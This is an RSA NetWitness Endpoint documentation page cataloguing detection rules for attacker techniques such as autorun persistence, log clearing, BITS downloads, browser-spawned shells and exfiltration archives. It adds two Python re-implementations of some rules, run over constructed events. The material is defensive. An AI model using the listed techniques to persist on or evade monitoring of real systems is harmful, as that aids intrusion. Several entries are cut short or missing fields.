RSA Application Rules for Endpoint

Document created by RSA Information Design and Development on Feb 14, 2020. Last modified by RSA Information Design and Development on Feb 14, 2020.
Version 2

The following entries list the RSA Application Rules for NetWitness Endpoint. Each entry gives the rule's Display Name, File Name, and Description, followed by the NetWitness Platform versions that support it, its dependencies, and the meta key it generates.

Display Name: Accesses Administrative Share Using Command Shell
File Name: accesses_administrative_share_using_command_shell
Description: Accessing an administrative share from a command shell can be an indicator of lateral movement or privilege escalation: these hidden network shares are accessible only to administrators and provide remote file copy and other administrative functions. This rule is supported on Windows 8 and higher.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = accesses administrative share using command shell
Display Name: Activates BITS Job
File Name: activates_bits_job
Description: Background Intelligent Transfer Service (BITS) is a Windows component used to transfer files. It has commonly been used for malware distribution.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = activates bits job
Display Name: Adds Files To BITS Download Job
File Name: adds_files_to_bits_download_job
Description: Background Intelligent Transfer Service (BITS) is a Windows component used to transfer files. It has commonly been used for malware distribution.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = adds files to bits download job
Display Name: Adds Firewall Rule
File Name: adds_firewall_rule
Description: Adding a firewall rule can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = adds firewall rule
Display Name: Allocates Remote Memory
File Name: allocates_remote_memory
Description: On Mac, a process not signed by Apple has allocated memory in another process. Most allocations occur only within the same process, and by processes signed by Apple. This generally indicates an attempt to inject code or data into another process, which may be a first step in reinforcing a malicious presence on a system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = allocates remote memory
Display Name: Antivirus Disabled
File Name: antivirus_disabled
Description: Disabling antivirus can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = antivirus disabled
Display Name: Archiving Software Reads Multiple Documents
File Name: archiving_software_reads_multiple_documents
Description: Multiple documents being read could be an indication of someone creating a large archive.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = archiving software reads multiple documents
Display Name: Autorun
File Name: autorun
Description: Indicates applications or commands that are configured to run on system startup.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun
Display Name: Autorun File Path Not Part Of RPM
File Name: autorun_file_path_not_part_of_rpm
Description: Installation and updates of software on Linux systems are typically done through RPM packages. Executables outside this packaging format could be considered suspicious.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun file path not part of rpm
Display Name: Autorun Invalid Signature Windows Directory
File Name: autorun_invalid_signature_windows_directory
Description: This rule returns any file with an invalid signature located in the following Windows directories: C:\ProgramData, C:\Users\<user>\AppData\Roaming, C:\Users\<user>\AppData\Local, C:\Windows.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun invalid signature windows directory
Display Name: Autorun Key Contains Non-Printable Characters
File Name: autorun_key_contains_non-printable_characters
Description: An autorun key containing non-printable characters is an indication of someone trying to use startup configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = autorun key contains non-printable characters
Display Name: Autorun RPM Mismatch
File Name: autorun_rpm_mismatch
Description: A hash mismatch may indicate a file has been altered from its original state and call its integrity into question. Since RPMs typically contain compiled software, this could mean an attacker is trying to disguise malware as legitimate software.
Display Name: Autorun Unsigned Active Setup
File Name: autorun_unsigned_active_setup
Description: Active Setup is a mechanism for executing commands once per user early during login; the commands are executed by explorer.exe. To ensure persistence across reboots and log-offs, attackers use Active Setup, which is even more suspicious when the executable is unsigned.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned active setup
Display Name: Autorun Unsigned AppInit_DLLs
File Name: autorun_unsigned_appinit_dlls
Description: Unsigned AppInit_DLLs autoruns can be an indication of an attacker abusing the registry key values for DLLs to obtain persistence and privilege escalation, by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned appinit_dlls
Display Name: Autorun Unsigned BHO
File Name: autorun_unsigned_bho
Description: BHOs can be used to monitor user browsing habits and deliver targeted advertising as well as steal information. Unsigned BHOs configured to run on system startup are used for persistence and are suspicious.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned bho
Display Name: Autorun Unsigned BootExecute Registry Startup Method
File Name: autorun_unsigned_bootexecute_registry_startup_method
Description: An unsigned autorun using the BootExecute registry startup method is an indication of someone trying to use startup configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned bootexecute registry startup method
Display Name: Autorun Unsigned Explorer Registry Startup Method
File Name: autorun_unsigned_explorer_registry_startup_method
Description: An unsigned autorun using the Explorer registry startup method is an indication of someone trying to use startup configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned explorer registry startup method
Display Name: Autorun Unsigned Hidden
File Name: autorun_unsigned_hidden
Description: Adversaries can hide files and folders anywhere on the system for persistence and evasion. To ensure persistence across reboots, attackers configure those files to run on system startup, which is even more suspicious when the file is unsigned.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned hidden
Display Name: Autorun Unsigned Hidden Only Executable In Directory
File Name: autorun_unsigned_hidden_only_executable_in_directory
Description: This rule returns any unsigned executable file launched as an autorun which has the "Hidden" Windows property.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned hidden only executable in directory
Display Name: Autorun Unsigned IE Toolbar
File Name: autorun_unsigned_ie_toolbar
Description: A toolbar can be spyware or adware which breaches privacy and steals data through the browser. To ensure persistence across reboots, attackers configure toolbars to run on system startup, which is even more suspicious when the toolbar is unsigned.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned ie toolbar
Display Name: Autorun Unsigned In AppDataLocal Directory
File Name: autorun_unsigned_in_appdatalocal_directory
Description: This rule looks for any registry logon autoruns (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce and \Run keys) that have actions pointing at files running out of AppData/Local/Temp on Windows systems. These locations are often used by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned in appdatalocal directory
Display Name: Autorun Unsigned In AppDataRoaming Directory
File Name: autorun_unsigned_in_appdataroaming_directory
Description: This rule looks for any registry logon autoruns (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce and \Run keys) that have actions pointing at files running out of AppData/Roaming on Windows systems. These locations are often used by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned in appdataroaming directory
Display Name: Autorun Unsigned In ProgramData Directory
File Name: autorun_unsigned_in_programdata_directory
Description: This rule looks for any registry logon autoruns (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce and \Run keys) that have actions pointing at files running out of the ProgramData directory on Windows systems. These locations are often used by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned in programdata directory
Display Name: Autorun Unsigned In Temp Directory
File Name: autorun_unsigned_in_temp_directory
Description: This rule looks for any registry logon autoruns (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce and \Run keys) that have actions pointing at files running out of a Temp directory on Windows systems. These locations are often used by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned in temp directory
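The five location-based autorun rules above (Autorun Invalid Signature Windows Directory and the four Autorun Unsigned In ... Directory rules) each reduce to a signature state plus a path test on an autorun record. The following Python is an added illustration, not NetWitness code or its rule language: it re-implements those checks over constructed autorun records so the conditions can be read side by side. The record layout, the signature vocabulary ("valid", "invalid", "unsigned") and the exact path patterns are assumptions made for this example; the analysis.file values, the HKCU Run/RunOnce keys and the directory names come from the descriptions above.

```python
"""Added example (not NetWitness code): simplified re-implementation of the
location-based autorun rules, evaluated over constructed autorun records."""
from dataclasses import dataclass
import ntpath
import re

# Registry keys named for the four "Autorun Unsigned In ... Directory" rules.
# Stored lower-case; registry paths are compared case-insensitively.
LOGON_AUTORUN_KEYS = {
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
    r"hkey_current_user\software\microsoft\windows\currentversion\runonce",
}

# Location patterns for the unsigned-autorun rules (assumed; the page names
# the directories only in prose).  Matched against a normalised path:
# lower-case, backslash separators.
UNSIGNED_LOCATION_RULES = (
    ("autorun unsigned in appdatalocal directory", re.compile(r"\\appdata\\local\\temp\\")),
    ("autorun unsigned in appdataroaming directory", re.compile(r"\\appdata\\roaming\\")),
    ("autorun unsigned in programdata directory", re.compile(r"\\programdata\\")),
    ("autorun unsigned in temp directory", re.compile(r"\\temp\\")),
)

# Directories listed for "Autorun Invalid Signature Windows Directory":
# C:\ProgramData, C:\Users\<user>\AppData\Roaming, C:\Users\<user>\AppData\Local, C:\Windows.
INVALID_SIG_DIRS = re.compile(
    r"^c:\\(programdata|windows|users\\[^\\]+\\appdata\\(roaming|local))\\"
)


@dataclass(frozen=True)
class AutorunEntry:
    registry_key: str   # autorun location in the registry (assumed field)
    image_path: str     # file the autorun action points at
    signature: str      # "valid", "invalid" or "unsigned" (assumed vocabulary)


def normalise(path: str) -> str:
    """Lower-case with backslash separators, so C:/x and c:\\x spell the same."""
    return ntpath.normcase(path)


def evaluate(entry: AutorunEntry) -> list:
    """Return the analysis.file values this entry generates.  A list, because
    one file can satisfy several rules and meta keys are multi-valued."""
    hits = []
    path = normalise(entry.image_path)
    key = entry.registry_key.lower()
    # The four location rules apply only to HKCU Run/RunOnce and unsigned files.
    if key in LOGON_AUTORUN_KEYS and entry.signature == "unsigned":
        for meta, pattern in UNSIGNED_LOCATION_RULES:
            if pattern.search(path):
                hits.append(meta)
    # The invalid-signature rule is keyed on the path alone, not the registry key.
    if entry.signature == "invalid" and INVALID_SIG_DIRS.match(path):
        hits.append("autorun invalid signature windows directory")
    return hits


def triage(entries) -> dict:
    """Map image path -> generated meta values, dropping entries with no hit."""
    out = {}
    for entry in entries:
        hits = evaluate(entry)
        if hits:
            out[entry.image_path] = hits
    return out


# Constructed sample records (not real telemetry).
HKCU_RUN = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
HKCU_RUNONCE = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce"
HKLM_RUN = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"

SAMPLE = [
    AutorunEntry(HKCU_RUN, r"C:\Users\alice\AppData\Local\Temp\updater.exe", "unsigned"),
    AutorunEntry(HKCU_RUNONCE, "C:/ProgramData/svc/agent.exe", "unsigned"),
    # HKLM key: outside the HKCU scope the descriptions give, so no location hit.
    AutorunEntry(HKLM_RUN, r"C:\Users\alice\AppData\Roaming\sync.exe", "unsigned"),
    AutorunEntry(HKLM_RUN, r"C:\Windows\Tasks\helper.exe", "invalid"),
    AutorunEntry(HKCU_RUN, r"C:\Program Files\Vendor\app.exe", "valid"),
]

if __name__ == "__main__":
    for image, metas in triage(SAMPLE).items():
        print(image)
        for meta in metas:
            print("  analysis.file =", meta)
```

The first sample record sits under both AppData\Local\Temp and a Temp directory, so it receives two analysis.file values; the third shows that the registry key condition, not just the path, decides whether the HKCU-scoped rules fire.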
Display Name: Autorun Unsigned LogonType Registry Startup Method
File Name: autorun_unsigned_logontype_registry_startup_method
Description: An unsigned autorun using the LogonType registry startup method is an indication of someone trying to use startup configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned logontype registry startup method
Display Name: Autorun Unsigned LSA Provider
File Name: autorun_unsigned_lsa_provider
Description: Windows Authentication Package (AP) DLLs are loaded by the Local Security Authority (LSA) process at system start. Attackers can introduce their own APs to control the logon process and the security protocols of the OS. To ensure persistence across reboots, attackers configure these to load on system startup, which is even more suspicious when the DLL is unsigned.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned lsa provider
Display Name: Autorun Unsigned ServiceDLL
File Name: autorun_unsigned_servicedll
Description: To evade defenses, a DLL can be run as a service; attackers use this technique to hide malware. To ensure persistence across reboots, attackers configure the service to run on system startup, which is even more suspicious when the DLL is unsigned.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned servicedll
Display Name: Autorun Unsigned Winlogon Helper DLL
File Name: autorun_unsigned_winlogon_helper_dll
Description: This rule looks for modifications to Winlogon registry keys that may cause Winlogon to load and execute malicious unsigned DLLs. Adversaries may take advantage of this feature to load adversarial code at startup for persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = autorun unsigned winlogon helper dll
Display Name: Autorun Unsigned Winsock LSP
File Name: autorun_unsigned_winsock_lsp
Description: A Winsock LSP is a DLL that is loaded when a process uses the Winsock API. It allows code to be inserted between the user's network calls and the Winsock API, letting an attacker inspect, modify, or block those network calls. To ensure persistence across reboots, attackers configure the LSP to load on system startup, which is even more suspicious when the DLL is unsigned.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned winsock lsp
Display Name: Bad Certificate Warning Disabled
File Name: bad_certificate_warning_disabled
Description: Disabling the bad certificate warning can be an indication of an adversary attempting to block indicators or event notifications, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = bad certificate warning disabled
Display Name: Blacklisted File
File Name: blacklisted_file
Description: An analyst may mark files as blacklisted within NetWitness Endpoint. If actions on an endpoint involve those blacklisted files as the source, this rule triggers.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = blacklisted file
Display Name: Browser Runs Command Prompt
File Name: browser_runs_command_prompt
Description: This rule returns any child process 'cmd.exe' spawned by a parent process of 'chrome.exe', 'iexplorer.exe', 'opera.exe' or 'firefox.exe'.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = browser runs command prompt
Display Name: Browser Runs Mshta
File Name: browser_runs_mshta
Description: Mshta.exe executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. It is suspicious for a browser to run Mshta.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = browser runs mshta
Display Name: Browser Runs Powershell
File Name: browser_runs_powershell
Description: A browser running PowerShell can be an indication of someone using the browser to run web-delivered malicious commands to compromise the system or the user, which can be used further to gain access, move laterally or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = browser runs powershell
Display Name: Builds Script Incrementally
File Name: builds_script_incrementally
Description: Building a script incrementally can be an indication of an attacker trying to execute a series of commands using a script, which can be used further to gain access, move laterally or gain elevated privileges. Attackers may take advantage of this to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = builds script incrementally
Display Name: Clears Security Event Log
File Name: clears_security_event_log
Description: Clearing the security event log can be a strong indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = clears security event log
Display Name: Clears System Event Log
File Name: clears_system_event_log
Description: Clearing the system event log can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = clears system event log
Display Name: Combines Binaries Using Command Prompt
File Name: combines_binaries_using_command_prompt
Description: Chaining binaries using the command prompt can be an indication of someone trying to run the multiple malicious commands needed to perform a multi-stage attack to exploit the system, which can be used further to gain access, move laterally or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = combines binaries using command prompt
Display Name: Command Line Usage Of Archiving Software
File Name: command_line_usage_of_archiving_software
Description: Use of the command line to create archive files demonstrates more advanced use of the tools and is atypical.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = command line usage of archiving software
Display Name: Command Line Writes Script Files
File Name: command_line_writes_script_files
Description: This rule returns any 'cmd.exe' or 'powershell.exe' that writes out a file with the extension 'vbs', 'vbe', 'wsh', 'wsf', 'vb', 'cmd' or 'bat'. Scripts can be used by adversaries for Defense Evasion as well as Execution.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = command line writes script files
Display Name: Command Prompt Obfuscation
File Name: command_prompt_obfuscation
Description: Command Prompt (cmd) in Windows can be used to perform a number of tasks, including execution of other software. Adversaries can run obfuscated commands in cmd to evade defense mechanisms; obfuscated commands can evade signature-based defenses.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = command prompt obfuscation
Display Name: Command Prompt Obfuscation Using Value Extraction
File Name: command_prompt_obfuscation_using_value_extraction
Description: Command Prompt (cmd) in Windows can be used to perform a number of tasks, including execution of other software. Adversaries can run obfuscated commands in cmd by extracting strings from environment variables for execution, to evade defense mechanisms; obfuscated commands can evade signature-based defenses.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = command prompt obfuscation using value extraction
Display Name: Command Shell Copy Items
File Name: command_shell_copy_items
Description: This rule returns any console event of 'cmd.exe' or 'powershell.exe' running a copy command.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = command shell copy items
Display Name: Command Shell Runs Rundll32
File Name: command_shell_runs_rundll32
Description: This rule returns any instance of 'cmd.exe' or 'powershell.exe' launching the Windows OS process 'rundll32.exe' with no arguments.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = command shell runs rundll32
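The Browser Runs Command Prompt, Browser Runs Mshta, Browser Runs Powershell, Command Line Writes Script Files and Command Shell Runs Rundll32 entries above are all parent/child-process or process/file-write conditions. The following Python is an added illustration, not NetWitness code or its rule language: it re-implements those five conditions over constructed endpoint events and emits the meta key and value each entry lists. The event layout, the "no arguments" test (an empty or whitespace-only argument string) and the sample paths are assumptions made for this example; the browser list (copied as written in the Browser Runs Command Prompt description), the shell names, the script extensions and the meta values come from the entries above.

```python
"""Added example (not NetWitness code): parent/child-process and script-write
rules from this page re-implemented over constructed endpoint events."""
from dataclasses import dataclass
import ntpath

# Process names as listed on the page (the browser list is copied verbatim).
BROWSERS = {"chrome.exe", "iexplorer.exe", "opera.exe", "firefox.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
SCRIPT_EXTS = {".vbs", ".vbe", ".wsh", ".wsf", ".vb", ".cmd", ".bat"}


@dataclass(frozen=True)
class ProcessEvent:
    parent: str        # image path or name of the parent process
    child: str         # image path or name of the launched process
    args: str = ""     # command-line arguments of the child (assumed field)


@dataclass(frozen=True)
class FileWriteEvent:
    process: str       # image path or name of the writing process
    target: str        # path of the file written


def _name(image: str) -> str:
    """Reduce a full image path to a lower-case file name for comparison."""
    return ntpath.basename(image).lower()


def check_process(ev: ProcessEvent) -> list:
    """Return (meta_key, value) pairs the page's launch rules generate."""
    parent, child = _name(ev.parent), _name(ev.child)
    hits = []
    if parent in BROWSERS:
        if child == "cmd.exe":
            hits.append(("boc", "browser runs command prompt"))
        elif child == "mshta.exe":
            hits.append(("boc", "browser runs mshta"))
        elif child == "powershell.exe":
            hits.append(("boc", "browser runs powershell"))
    # Shell launching rundll32.exe with no arguments at all.
    if parent in SHELLS and child == "rundll32.exe" and not ev.args.strip():
        hits.append(("ioc", "command shell runs rundll32"))
    return hits


def check_file_write(ev: FileWriteEvent) -> list:
    """Return the eoc value when a shell writes a script-type file."""
    ext = ntpath.splitext(ev.target)[1].lower()
    if _name(ev.process) in SHELLS and ext in SCRIPT_EXTS:
        return [("eoc", "command line writes script files")]
    return []


def evaluate(events) -> list:
    """Run each event through the matching checker; keep only events that hit."""
    results = []
    for ev in events:
        hits = check_process(ev) if isinstance(ev, ProcessEvent) else check_file_write(ev)
        if hits:
            results.append((ev, hits))
    return results


# Constructed sample events (not real telemetry).
SAMPLE = [
    ProcessEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 r"C:\Windows\System32\cmd.exe", "/c whoami"),
    ProcessEvent("firefox.exe", r"C:\Windows\System32\mshta.exe",
                 r"C:\Users\alice\Downloads\invoice.hta"),
    ProcessEvent("explorer.exe", "cmd.exe"),                 # ordinary desktop launch: no hit
    ProcessEvent("cmd.exe", "rundll32.exe"),                 # rundll32 with no arguments
    ProcessEvent("cmd.exe", "rundll32.exe", "example.dll,Entry"),  # has arguments: no hit
    FileWriteEvent("powershell.exe", r"C:\Users\alice\AppData\Local\Temp\stage2.vbs"),
    FileWriteEvent("powershell.exe", r"C:\Users\alice\notes.txt"),
]

if __name__ == "__main__":
    for ev, hits in evaluate(SAMPLE):
        print(ev)
        for key, value in hits:
            print(f"  {key} = {value}")
```

Image paths are reduced to their file names before comparison, so a full path and a bare name match the same rule; the explorer.exe launch and the rundll32.exe call with arguments are included to show the conditions that keep the rules from firing.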
Display Name: Completes BITS Download Job
File Name: completes_bits_download_job
Description: Background Intelligent Transfer Service (BITS) is a Windows component used to transfer files. It has commonly been used for malware distribution.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = completes bits download job
Display Name: Configures Image Hijacking
File Name: configures_image_hijacking
Description: Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. The value of the debugger process can be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and invoked continuously. Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = configures image hijacking
Display Name: Configures Port Redirection
File Name: configures_port_redirection
Description: Configuring port redirection can be an indication of adversaries using the connection to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communication paths between victims to avoid suspicion.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = configures port redirection
Display Name: Copies Binary Over Administrative Share
File Name: copies_binary_over_administrative_share
Description: Administrative shares, once compromised, can be used to distribute malware.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = copies binary over administrative share
Display Name: Created In Last Month
File Name: created_in_last_month
Description: Files created in the last month may be reviewed for malicious intent.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = created in last month
Display Name: Creates Browser Extension
File Name: creates_browser_extension
Description: Browser extensions or plugins are small programs that add functionality and customize aspects of internet browsers. Once installed, malicious extensions can browse to websites in the background, steal all information that a user enters into the browser, and be used as an installer for a RAT for persistence.
Display Name: Creates Domain User Account
File Name: creates_domain_user_account
Description: Creating a domain user account can be an indication of an adversary with a sufficient level of access establishing a foothold. Such accounts may be used for persistence without requiring persistent remote access tools to be deployed on the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = creates domain user account
Display Name: Creates Executable In Startup Directory
File Name: creates_executable_in_startup_directory
Description: Creating an executable in a startup directory can be an indication of someone trying to use startup configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = creates executable in startup directory
Display Name: Creates Local Driver Service
File Name: creates_local_driver_service
Description: Creating a local driver service can be an indication of someone trying to maintain persistent access on the system using driver services, which can execute under SYSTEM privileges, modify the registry and create back

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = creates local driver service
Display Name: Creates Local Service
File Name: creates_local_service
Description: Creating a local service can be an indication of someone trying to maintain a persistent presence on the system using local services, which can modify the registry, escalate privileges and create a backdoor.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = creates local service
Display Name: Creates Local Task
File Name: creates_local_task
Description: Creating a local task can be an indication of someone trying to use task scheduling to execute programs at system startup or on a schedule for persistence, to conduct remote execution as part of lateral movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = creates local task
Display Name: Creates Local User Account
File Name: creates_local_user_account
Description: Creating a local user account can be an indication of an adversary with a sufficient level of access establishing a foothold. Such accounts may be used for persistence without requiring persistent remote access tools to be deployed on the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = creates local user account
Display Name: Creates Password-Protected Archive
File Name: creates_password-protected_archive
Description: Password-protected archive files can be used to exfiltrate sensitive data, since their contents cannot be examined.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
